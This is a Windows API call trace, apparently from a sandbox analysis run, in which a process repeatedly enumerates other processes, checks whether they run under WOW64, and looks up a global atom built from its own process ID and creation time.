	[0091.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0091.968] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.968] CloseHandle (hObject=0x20c) returned 1
	[0091.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0091.968] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.968] CloseHandle (hObject=0x20c) returned 1
	[0091.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0091.968] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.968] CloseHandle (hObject=0x20c) returned 1
	[0091.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0091.968] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.968] CloseHandle (hObject=0x20c) returned 1
	[0091.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0091.968] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.968] CloseHandle (hObject=0x20c) returned 1
	[0091.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0091.969] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.969] CloseHandle (hObject=0x20c) returned 1
	[0091.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0091.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0091.969] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.969] CloseHandle (hObject=0x20c) returned 1
	[0091.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0091.969] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.969] CloseHandle (hObject=0x20c) returned 1
	[0091.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0091.969] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.969] CloseHandle (hObject=0x20c) returned 1
	[0091.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0091.969] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.970] CloseHandle (hObject=0x20c) returned 1
	[0091.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0091.970] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.970] CloseHandle (hObject=0x20c) returned 1
	[0091.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0091.970] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.970] CloseHandle (hObject=0x20c) returned 1
	[0091.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0091.970] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.970] CloseHandle (hObject=0x20c) returned 1
	[0091.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0091.970] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.970] CloseHandle (hObject=0x20c) returned 1
	[0091.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0091.970] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.971] CloseHandle (hObject=0x20c) returned 1
	[0091.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0091.971] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.971] CloseHandle (hObject=0x20c) returned 1
	[0091.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0091.971] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.971] CloseHandle (hObject=0x20c) returned 1
	[0091.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0091.971] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.971] CloseHandle (hObject=0x20c) returned 1
	[0091.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0091.971] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.971] CloseHandle (hObject=0x20c) returned 1
	[0091.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0091.971] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.971] CloseHandle (hObject=0x20c) returned 1
	[0091.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0091.972] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.972] CloseHandle (hObject=0x20c) returned 1
	[0091.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0091.972] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.972] CloseHandle (hObject=0x20c) returned 1
	[0091.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0091.972] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.972] CloseHandle (hObject=0x20c) returned 1
	[0091.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0091.972] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.972] CloseHandle (hObject=0x20c) returned 1
	[0091.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0091.972] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.972] CloseHandle (hObject=0x20c) returned 1
	[0091.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0091.973] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.973] CloseHandle (hObject=0x20c) returned 1
	[0091.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0091.973] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.973] CloseHandle (hObject=0x20c) returned 1
	[0091.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0091.973] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.973] CloseHandle (hObject=0x20c) returned 1
	[0091.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0091.973] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.973] CloseHandle (hObject=0x20c) returned 1
	[0091.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0091.973] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.974] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0091.974] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0091.974] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0091.974] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.974] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0091.974] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.974] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0091.974] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0091.974] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0091.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0091.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0091.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0091.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0091.975] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.975] CloseHandle (hObject=0x20c) returned 1
	[0091.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0091.975] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.975] CloseHandle (hObject=0x20c) returned 1
	[0092.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0092.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0092.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0092.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0092.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0092.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0092.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0092.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0092.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0092.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0092.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0092.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0092.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0092.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0092.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0092.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0092.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0092.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0092.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0092.092] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.092] CloseHandle (hObject=0x20c) returned 1
	[0092.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0092.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0092.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0092.092] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.092] CloseHandle (hObject=0x20c) returned 1
	[0092.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0092.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0092.092] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.092] CloseHandle (hObject=0x20c) returned 1
	[0092.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0092.093] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.093] CloseHandle (hObject=0x20c) returned 1
	[0092.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0092.093] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.093] CloseHandle (hObject=0x20c) returned 1
	[0092.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0092.093] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.093] CloseHandle (hObject=0x20c) returned 1
	[0092.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0092.093] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.093] CloseHandle (hObject=0x20c) returned 1
	[0092.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0092.093] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.093] CloseHandle (hObject=0x20c) returned 1
	[0092.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0092.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0092.094] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.094] CloseHandle (hObject=0x20c) returned 1
	[0092.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0092.094] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.094] CloseHandle (hObject=0x20c) returned 1
	[0092.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0092.094] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.094] CloseHandle (hObject=0x20c) returned 1
	[0092.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0092.094] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.094] CloseHandle (hObject=0x20c) returned 1
	[0092.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0092.094] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.095] CloseHandle (hObject=0x20c) returned 1
	[0092.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0092.095] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.095] CloseHandle (hObject=0x20c) returned 1
	[0092.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0092.095] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.095] CloseHandle (hObject=0x20c) returned 1
	[0092.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0092.095] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.095] CloseHandle (hObject=0x20c) returned 1
	[0092.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0092.095] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.095] CloseHandle (hObject=0x20c) returned 1
	[0092.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0092.096] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.096] CloseHandle (hObject=0x20c) returned 1
	[0092.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0092.096] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.096] CloseHandle (hObject=0x20c) returned 1
	[0092.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0092.096] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.096] CloseHandle (hObject=0x20c) returned 1
	[0092.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0092.096] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.096] CloseHandle (hObject=0x20c) returned 1
	[0092.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0092.096] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.096] CloseHandle (hObject=0x20c) returned 1
	[0092.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0092.096] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.096] CloseHandle (hObject=0x20c) returned 1
	[0092.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0092.097] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.097] CloseHandle (hObject=0x20c) returned 1
	[0092.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0092.097] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.097] CloseHandle (hObject=0x20c) returned 1
	[0092.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0092.097] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.097] CloseHandle (hObject=0x20c) returned 1
	[0092.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0092.097] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.097] CloseHandle (hObject=0x20c) returned 1
	[0092.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0092.097] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.097] CloseHandle (hObject=0x20c) returned 1
	[0092.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0092.098] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.098] CloseHandle (hObject=0x20c) returned 1
	[0092.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0092.098] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.098] CloseHandle (hObject=0x20c) returned 1
	[0092.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0092.098] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.098] CloseHandle (hObject=0x20c) returned 1
	[0092.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0092.098] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0092.099] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0092.099] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0092.099] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0092.099] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0092.099] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0092.099] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0092.099] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0092.100] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0092.100] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0092.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0092.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0092.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0092.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0092.100] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.100] CloseHandle (hObject=0x20c) returned 1
	[0092.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0092.100] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.100] CloseHandle (hObject=0x20c) returned 1
	[0092.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0092.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0092.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0092.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0092.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0092.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0092.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0092.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0092.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0092.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0092.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0092.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0092.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0092.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0092.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0092.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0092.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0092.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0092.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0092.179] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.179] CloseHandle (hObject=0x20c) returned 1
	[0092.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0092.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0092.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0092.179] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.180] CloseHandle (hObject=0x20c) returned 1
	[0092.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0092.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0092.180] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.180] CloseHandle (hObject=0x20c) returned 1
	[0092.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0092.180] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.180] CloseHandle (hObject=0x20c) returned 1
	[0092.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0092.180] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.180] CloseHandle (hObject=0x20c) returned 1
	[0092.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0092.180] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.180] CloseHandle (hObject=0x20c) returned 1
	[0092.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0092.181] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.181] CloseHandle (hObject=0x20c) returned 1
	[0092.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0092.181] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.181] CloseHandle (hObject=0x20c) returned 1
	[0092.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0092.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
